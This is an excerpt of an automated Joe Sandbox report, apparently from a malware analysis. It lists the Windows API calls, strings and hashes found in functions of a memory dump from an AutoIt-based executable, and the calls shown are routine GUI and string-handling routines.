                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: edd849bb429907b24e7f1dcf349d8186f12cb5233da09e89a85f385b483b2911
                                                                        • Instruction ID: 63324a06bbc04ee6173be462503b0eb43a20392efcd9cd9c7e0feba4abec6982
                                                                        • Opcode Fuzzy Hash: edd849bb429907b24e7f1dcf349d8186f12cb5233da09e89a85f385b483b2911
                                                                        • Instruction Fuzzy Hash: 5602DE30604301EFE765EF18C848BAABBE8FF89714F048659F6D5A72A1C77AD940CB51
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0106AF51
                                                                        • SetTextColor.GDI32(?,?), ref: 0106AF55
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0106AF6B
                                                                        • GetSysColor.USER32(0000000F), ref: 0106AF76
                                                                        • CreateSolidBrush.GDI32(?), ref: 0106AF7B
                                                                        • GetSysColor.USER32(00000011), ref: 0106AF93
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0106AFA1
                                                                        • SelectObject.GDI32(?,00000000), ref: 0106AFB2
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0106AFBB
                                                                        • SelectObject.GDI32(?,?), ref: 0106AFC8
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0106AFE7
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0106AFFE
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0106B013
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0106B05F
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0106B086
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0106B0A4
                                                                        • DrawFocusRect.USER32(?,?), ref: 0106B0AF
                                                                        • GetSysColor.USER32(00000011), ref: 0106B0BD
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0106B0C5
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0106B0D9
                                                                        • SelectObject.GDI32(?,0106AC1F), ref: 0106B0F0
                                                                        • DeleteObject.GDI32(?), ref: 0106B0FB
                                                                        • SelectObject.GDI32(?,?), ref: 0106B101
                                                                        • DeleteObject.GDI32(?), ref: 0106B106
                                                                        • SetTextColor.GDI32(?,?), ref: 0106B10C
                                                                        • SetBkColor.GDI32(?,?), ref: 0106B116
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 6e443b01568c26b230e75d802e2a26428cd1ee476e0f9501fa5561034c27575e
                                                                        • Instruction ID: 08d7ccfb66958fa52938b424e9f631e7545a84349fea3768ca4dc40fde689d73
                                                                        • Opcode Fuzzy Hash: 6e443b01568c26b230e75d802e2a26428cd1ee476e0f9501fa5561034c27575e
                                                                        • Instruction Fuzzy Hash: DB6130B1D00218AFEB119FA8DC48AAEBFB9FF09320F104255F955BB295D7769940CF90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 010690EA
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010690FB
                                                                        • CharNextW.USER32(0000014E), ref: 0106912A
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0106916B
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01069181
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01069192
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 010691AF
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 010691FB
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01069211
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01069242
                                                                        • _memset.LIBCMT ref: 01069267
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 010692B0
                                                                        • _memset.LIBCMT ref: 0106930F
                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01069339
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 01069391
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0106943E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 01069460
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010694AA
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010694D7
                                                                        • DrawMenuBar.USER32(?), ref: 010694E6
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0106950E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 988d708e14d0ee65af6074b44ef8aed85b8216ece1e7a5abbea99c9868c26f68
                                                                        • Instruction ID: cfaa4affac119d3a1b59141f3158e3fa62e933e2d6c1ee784dff2fb1c3733af5
                                                                        • Opcode Fuzzy Hash: 988d708e14d0ee65af6074b44ef8aed85b8216ece1e7a5abbea99c9868c26f68
                                                                        • Instruction Fuzzy Hash: DFE1C270900219AFEF219F54CC84EEE7BBCFF09714F108196FA95AA584D7758A81CF61
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 01065007
                                                                        • GetDesktopWindow.USER32 ref: 0106501C
                                                                        • GetWindowRect.USER32(00000000), ref: 01065023
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01065085
                                                                        • DestroyWindow.USER32(?), ref: 010650B1
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010650DA
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010650F8
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0106511E
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 01065133
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01065146
                                                                        • IsWindowVisible.USER32(?), ref: 01065166
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01065181
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01065195
                                                                        • GetWindowRect.USER32(?,?), ref: 010651AD
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 010651D3
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 010651ED
                                                                        • CopyRect.USER32(?,?), ref: 01065204
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 0106526F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 0ba6cbd6a7e0075853909ca868b05b44ccd26a085dc3f208c63d73036b7aac27
                                                                        • Instruction ID: 8c493aa465d970882d58eee5eef57d38f1799f73b65707b114ba3c239467327f
                                                                        • Opcode Fuzzy Hash: 0ba6cbd6a7e0075853909ca868b05b44ccd26a085dc3f208c63d73036b7aac27
                                                                        • Instruction Fuzzy Hash: F4B1AC70604341AFD754DF64CC88B6ABBE8BF89710F008A1CF599AB291D775E804CB92
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0104499C
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010449C2
                                                                        • _wcscpy.LIBCMT ref: 010449F0
                                                                        • _wcscmp.LIBCMT ref: 010449FB
                                                                        • _wcscat.LIBCMT ref: 01044A11
                                                                        • _wcsstr.LIBCMT ref: 01044A1C
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01044A38
                                                                        • _wcscat.LIBCMT ref: 01044A81
                                                                        • _wcscat.LIBCMT ref: 01044A88
                                                                        • _wcsncpy.LIBCMT ref: 01044AB3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: a94f7f90d4dfb611e9e5fea0d4ded3870adb7a1b7127bd4ec2547e45dffb2b4b
                                                                        • Instruction ID: 9a5ab51192432414190a36351dd27b802eeb1562ae31845f8a48af3e53562e66
                                                                        • Opcode Fuzzy Hash: a94f7f90d4dfb611e9e5fea0d4ded3870adb7a1b7127bd4ec2547e45dffb2b4b
                                                                        • Instruction Fuzzy Hash: 23414972A002057BFB12B6759C46FFF7BACEF51250F000069F9C4EA191EB74DA1196A5
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE2C8C
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00FE2C94
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE2CBF
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00FE2CC7
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00FE2CEC
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FE2D09
                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FE2D19
                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FE2D4C
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FE2D60
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00FE2D7E
                                                                        • GetStockObject.GDI32(00000011), ref: 00FE2D9A
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE2DA5
                                                                          • Part of subcall function 00FE2714: GetCursorPos.USER32(?), ref: 00FE2727
                                                                          • Part of subcall function 00FE2714: ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00FE13C7), ref: 00FE2DCC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: 51ba375f6aa7b597489228dc9b41f1549b916cee96553fbf5471830966f43dfc
                                                                        • Instruction ID: 24c0c67570adbcab1df8f640277f047798343d20bcb1eb5d64339a0abf1aae64
                                                                        • Opcode Fuzzy Hash: 51ba375f6aa7b597489228dc9b41f1549b916cee96553fbf5471830966f43dfc
                                                                        • Instruction Fuzzy Hash: 38B1C131A4024A9FEB64DFA9CD45BAE7BB4FB08310F108229FA55E7284DB79D800DF50
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • GetForegroundWindow.USER32(01070980,?,?,?,?,?), ref: 010004E3
                                                                        • IsWindow.USER32(?), ref: 010366BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground_memmove
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 3828923867-1919597938
                                                                        • Opcode ID: 9d3864b4020b4f31bcde302727ba103c3900d14b29dd099676005d6260e50e39
                                                                        • Instruction ID: 589b909464593726b8a648a082aeb71663ebcbc1ebfa6f77ce0989792c6d591f
                                                                        • Opcode Fuzzy Hash: 9d3864b4020b4f31bcde302727ba103c3900d14b29dd099676005d6260e50e39
                                                                        • Instruction Fuzzy Hash: F4D1F330104202EBDB05EF24C850AAEBBF8BF95384F104A19F5D5932A1DB32EA59DB91
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 010644AC
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0106456C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 3e35f9e68a8fbe481efd16a3cb9d2c74d8c3669fb1ccf777758c14cd8b1f3ff2
                                                                        • Instruction ID: 6f012c16fa3fa6abb24f9c295c0ffc07c658af24c19f630fff0be45f7b5193cc
                                                                        • Opcode Fuzzy Hash: 3e35f9e68a8fbe481efd16a3cb9d2c74d8c3669fb1ccf777758c14cd8b1f3ff2
                                                                        • Instruction Fuzzy Hash: 77A189302142429FDB14EF24C950AAEB7A9BF99354F10895CF9D69B2E2DB34EC05CB52
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 010556E1
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 010556EC
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 010556F7
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 01055702
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0105570D
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 01055718
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 01055723
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 0105572E
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 01055739
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 01055744
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 0105574F
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 0105575A
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 01055765
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 01055770
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0105577B
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 01055786
                                                                        • GetCursorInfo.USER32(?), ref: 01055796
                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 010557C1
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                        • String ID:
                                                                        • API String ID: 3215588206-0
                                                                        • Opcode ID: cb6487facd3419580963d9355ab02094fe1686fcc2cf8a3ce620c4a5eaa21827
                                                                        • Instruction ID: e5afb2924574cf24796ede138e08680a47b9395739fcacf56fccfe8dd9884dd2
                                                                        • Opcode Fuzzy Hash: cb6487facd3419580963d9355ab02094fe1686fcc2cf8a3ce620c4a5eaa21827
                                                                        • Instruction Fuzzy Hash: 9C415470E043196ADB509FBA8C49D6FFFF8EF51B10B00456FE549E7290DAB8A401CE51
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0103B17B
                                                                        • __swprintf.LIBCMT ref: 0103B21C
                                                                        • _wcscmp.LIBCMT ref: 0103B22F
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0103B284
                                                                        • _wcscmp.LIBCMT ref: 0103B2C0
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0103B2F7
                                                                        • GetDlgCtrlID.USER32(?), ref: 0103B349
                                                                        • GetWindowRect.USER32(?,?), ref: 0103B37F
                                                                        • GetParent.USER32(?), ref: 0103B39D
                                                                        • ScreenToClient.USER32(00000000), ref: 0103B3A4
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0103B41E
                                                                        • _wcscmp.LIBCMT ref: 0103B432
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0103B458
                                                                        • _wcscmp.LIBCMT ref: 0103B46C
                                                                          • Part of subcall function 0100385C: _iswctype.LIBCMT ref: 01003864
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                        • String ID: %s%u
                                                                        • API String ID: 3744389584-679674701
                                                                        • Opcode ID: 0bf2bf5120b8b62d0e10fb5dcadae6fcbcf24098b6969c170d5ac74dfc4693f3
                                                                        • Instruction ID: 03296ad7809f79a6197af31c0e4939488a4155d7492acb9f052480261b82cae6
                                                                        • Opcode Fuzzy Hash: 0bf2bf5120b8b62d0e10fb5dcadae6fcbcf24098b6969c170d5ac74dfc4693f3
                                                                        • Instruction Fuzzy Hash: ADA1B071604306AFD756DE28C884BEABBECFF84358F108629FAD992190DB30E555CB91
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0103BAB1
                                                                        • _wcscmp.LIBCMT ref: 0103BAC2
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0103BAEA
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0103BB07
                                                                        • _wcscmp.LIBCMT ref: 0103BB25
                                                                        • _wcsstr.LIBCMT ref: 0103BB36
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0103BB6E
                                                                        • _wcscmp.LIBCMT ref: 0103BB7E
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0103BBA5
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0103BBEE
                                                                        • _wcscmp.LIBCMT ref: 0103BBFE
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0103BC26
                                                                        • GetWindowRect.USER32(00000004,?), ref: 0103BC8F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: b951f637cf9c63a8f12183b90d5274a929a263c4b85fe5e4b76ae1f1fc331b81
                                                                        • Instruction ID: 45db16fbbca70e1054964745fe2485b21c8e292b4afd0ccd173d61b22f523426
                                                                        • Opcode Fuzzy Hash: b951f637cf9c63a8f12183b90d5274a929a263c4b85fe5e4b76ae1f1fc331b81
                                                                        • Instruction Fuzzy Hash: D381A37100420A9FEB65DF18C885FAA7BDCFF84318F0485A9FEC99A096DB34D945CB61
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: b75e2c9adb93d8c4e66f0d86ffdb1383fab5de4288420f1fc9f1f36e3331a022
                                                                        • Instruction ID: 068f52dbc5a67a51ef96d490b144075fea63a967ab6d68586e309d428cafd835
                                                                        • Opcode Fuzzy Hash: b75e2c9adb93d8c4e66f0d86ffdb1383fab5de4288420f1fc9f1f36e3331a022
                                                                        • Instruction Fuzzy Hash: 0C31F631A44209EADF11EB51CD13EFE77B8BF64350F20012AE5C1BA0E1EF596E00D691
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 0103CBAA
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0103CBBC
                                                                        • SetWindowTextW.USER32(?,?), ref: 0103CBD3
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0103CBE8
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0103CBEE
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CBFE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0103CC04
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0103CC25
